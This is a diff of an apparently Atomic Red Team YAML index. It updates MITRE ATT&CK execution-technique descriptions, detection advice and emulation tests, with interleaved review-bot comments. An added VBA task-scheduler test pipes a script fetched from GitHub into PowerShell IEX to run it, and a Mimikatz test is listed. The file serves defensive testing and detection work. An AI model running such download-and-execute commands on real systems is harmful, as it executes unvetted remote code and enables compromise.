+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
- url: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/
description: Yerko Grbic. (2017, February 14). Macro Malware Targets Macs.
Retrieved July 8, 2017.
@@ -43158,25 +50962,32 @@ execution:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: AppleScript
description: |-
- Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
+ Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
- osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
+ Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
- Adversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
+ AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
+
+ Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
id: attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-04-14T13:28:17.696Z'
+ modified: '2020-08-03T21:40:51.878Z'
created: '2020-03-09T14:07:54.329Z'
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Phil Stokes, SentinelOne
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- x_mitre_detection: Monitor for execution of AppleScript through osascript that
- may be related to other suspicious behavior occurring on the system.
+ x_mitre_detection: |-
+ Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
+
+ Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
x_mitre_data_sources:
+ - API monitoring
- Process monitoring
- Process command-line parameters
x_mitre_platforms:
@@ -43412,7 +51223,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-06-25T03:32:51.380Z'
+ modified: '2020-10-22T16:43:39.362Z'
created: '2017-05-31T21:30:49.546Z'
x_mitre_is_subtechnique: false
x_mitre_remote_support: false
@@ -43422,6 +51233,7 @@ execution:
- Linux
- macOS
- Windows
+ - Network
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -43433,7 +51245,7 @@ execution:
- PowerShell logs
- Process monitoring
- Process command-line parameters
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
atomic_tests: []
T1559.001:
technique:
@@ -44004,13 +51816,14 @@ execution:
atomic_tests: []
T1559:
technique:
- created: '2020-02-12T14:08:48.689Z'
- modified: '2020-03-28T19:34:47.546Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- type: attack-pattern
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1559
+ url: https://attack.mitre.org/techniques/T1559
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
share data, communicate with each other, or synchronize execution. IPC is
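Review bot: The T1559 `technique` mapping in this hunk is rewritten only to reorder its keys (`external_references`, `object_marking_refs`, `name` move to the top while `id`, `type`, `kill_chain_phases`, `modified`, `created` move down), and the same pure reordering recurs in the T1106 and T1059.001 hunks below; no value visible in this hunk changes. This index looks generated from the ATT&CK STIX data, so the churn presumably reflects the serializer preserving whatever key order the source object arrived in. Having the generator sort the keys of each `technique` mapping before serializing would keep the diff limited to substantive ATT&CK changes (new references, description and detection text, version bumps), which is what a reviewer of this file actually needs to verify. Since the rest of the T1559 entry continues into the following hunk, please also check that the reorder did not drop or duplicate a key across the hunk boundary.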
@@ -44022,28 +51835,27 @@ execution:
or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).
Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,
may also leverage underlying IPC mechanisms."
- name: Inter-Process Communication
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
- or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ modified: '2020-03-28T19:34:47.546Z'
+ created: '2020-02-12T14:08:48.689Z'
x_mitre_data_sources:
- Process monitoring
- DLL monitoring
- File monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ - SYSTEM
+ x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
+ or spawned processes that are associated with abuse of IPC mechanisms.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1059.007:
technique:
@@ -44618,17 +52430,14 @@ execution:
atomic_tests: []
T1106:
technique:
- id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Native API
- description: |-
- Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
-
- Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
-
- Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
-
- Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
+ created: '2017-05-31T21:31:17.472Z'
+ modified: '2020-07-01T16:19:54.646Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1106
@@ -44675,21 +52484,26 @@ execution:
- source_name: macOS Foundation
url: https://developer.apple.com/documentation/foundation
description: Apple. (n.d.). Foundation. Retrieved July 1, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-07-01T16:19:54.646Z'
- created: '2017-05-31T21:31:17.472Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_remote_support: false
- x_mitre_permissions_required:
- - User
+ description: |-
+ Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
+
+ Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
+
+ Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
+
+ Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
+ name: Native API
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - System calls
+ - Loaded DLLs
+ - API monitoring
+ - Process monitoring
x_mitre_detection: "Monitoring API calls may generate a significant amount of
data and may not be useful for defense unless collected under specific circumstances,
since benign use of API functions are common and difficult to distinguish
@@ -44703,15 +52517,13 @@ execution:
to abnormal/unusual or potentially malicious processes, may indicate abuse
of the Windows API. Though noisy, this data can be combined with other indicators
to identify adversary activity. "
- x_mitre_data_sources:
- - System calls
- - Loaded DLLs
- - API monitoring
- - Process monitoring
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_remote_support: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
@@ -44734,8 +52546,83 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
%tmp%/T1106.exe
name: command_prompt
+ T1059.008:
+ technique:
+ id: attack-pattern--818302b2-d640-477b-bf88-873120ce85c4
+ description: "Adversaries may abuse scripting or built-in command line interpreters
+ (CLI) on network devices to execute malicious command and payloads. The CLI
+ is the primary means through which users and administrators interact with
+ the device in order to view system information, modify device operations,
+ or perform diagnostic and administrative functions. CLIs typically contain
+ various permission levels required for different commands. \n\nScripting interpreters
+ automate tasks and extend functionality beyond the command set included in
+ the network OS. The CLI and scripting interpreter are accessible through a
+ direct console connection, or through remote means, such as telnet or secure
+ shell (SSH).\n\nAdversaries can use the network CLI to change how network
+ devices behave and operate. The CLI may be used to manipulate traffic flows
+ to intercept or manipulate data, modify startup configuration parameters to
+ load malicious system software, or to disable security features or logging
+ to avoid detection. (Citation: Cisco Synful Knock Evolution)"
+ name: Network Device CLI
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.008
+ url: https://attack.mitre.org/techniques/T1059/008
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Command History
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
+ History. Retrieved October 21, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ modified: '2020-10-22T16:43:38.388Z'
+ created: '2020-10-20T00:09:33.072Z'
+ x_mitre_data_sources:
+ - Network device logs
+ - Network device run-time memory
+ - Network device command history
+ - Network device configuration
+ x_mitre_platforms:
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
+
+ Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ atomic_tests: []
T1059.001:
technique:
+ created: '2020-03-09T13:48:55.078Z'
+ modified: '2020-06-24T13:51:22.360Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
+ description: |-
+ Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
+
+ PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
+
+ A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
+
+ PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
+ name: PowerShell
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1059.001
@@ -44768,37 +52655,10 @@ execution:
description: Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH
POWERSHELL LOGGING. Retrieved February 16, 2016.
source_name: FireEye PowerShell Logging 2016
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: PowerShell
- description: |-
- Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
-
- PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
-
- A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
-
- PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
- id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-06-24T13:51:22.360Z'
- created: '2020-03-09T13:48:55.078Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_remote_support: true
- x_mitre_detection: |-
- If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
-
- Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
-
- It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Praetorian
x_mitre_data_sources:
- Windows event logs
- Process monitoring
@@ -44807,10 +52667,18 @@ execution:
- Loaded DLLs
- File monitoring
- DLL monitoring
- x_mitre_contributors:
- - Praetorian
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
+
+ Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
+
+ It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1059.001
atomic_tests:
- name: Mimikatz
@@ -45474,10 +53342,58 @@ execution:
>$null 2>&1
'
+ - name: Task Scheduler via VBA
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
+ description: |
+ This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+ 30 - 40 seconds after this module has run
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
+ name: powershell
T1053:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:46.977Z'
+ modified: '2020-10-14T15:20:01.069Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scheduled Task/Job
+ description: |-
+ Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
+
+ Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
external_references:
- source_name: mitre-attack
external_id: T1053
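Review bot: The executor `command:` line of the new `Task Scheduler via VBA` test fetches `Invoke-MalDoc.ps1` from the `master` branch of raw.githubusercontent.com and pipes it straight into `IEX`, with no commit pin and no integrity check, so whatever that branch holds at run time is what executes on the test host. The `Extract Memory via VBA` test added in the later T1059.005 hunk uses the same pattern. Pinning the URL to a specific commit (or vendoring the script next to the macro file that is already shipped under the atomics folder) and comparing a known hash before invoking it would make the test reproducible and reduce the supply-chain exposure. If this index is generated from the per-technique atomic YAML, the change belongs in that source file rather than here.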
@@ -45489,35 +53405,21 @@ execution:
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
source_name: TechNet Task Scheduler Security
- description: |-
- Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
-
- Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
- name: Scheduled Task/Job
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-24T13:45:04.006Z'
- created: '2017-05-31T21:30:46.977Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_remote_support: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -45528,19 +53430,18 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1064:
technique:
@@ -45805,8 +53706,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1072
external_id: T1072
+ url: https://attack.mitre.org/techniques/T1072
+ - external_id: CAPEC-187
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/187.html
description: |-
Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).
@@ -45822,10 +53726,10 @@ execution:
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-02-21T16:31:32.789Z'
+ modified: '2020-09-16T15:27:01.403Z'
created: '2017-05-31T21:30:57.201Z'
x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- Authentication logs
- File monitoring
@@ -45951,6 +53855,73 @@ execution:
- Windows
- macOS
atomic_tests: []
+ T1053.006:
+ technique:
+ id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
+ description: |-
+ Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
+
+ Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
+
+ An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
+ name: Systemd Timers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1053.006
+ url: https://attack.mitre.org/techniques/T1053/006
+ - source_name: archlinux Systemd Timers Aug 2020
+ url: https://wiki.archlinux.org/index.php/Systemd/Timers
+ description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
+ 12, 2020.
+ - source_name: 'Linux man-pages: systemd January 2014'
+ url: http://man7.org/linux/man-pages/man1/systemd.1.html
+ description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
+ Retrieved April 23, 2019.
+ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
+ AUR Package Repository. Retrieved April 23, 2019.
+ url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
+ source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
+ - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
+ Arch package compromise. Retrieved April 23, 2019.
+ url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
+ source_name: gist Arch package compromise 10JUL2018
+ - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
+ April 23, 2019.
+ url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
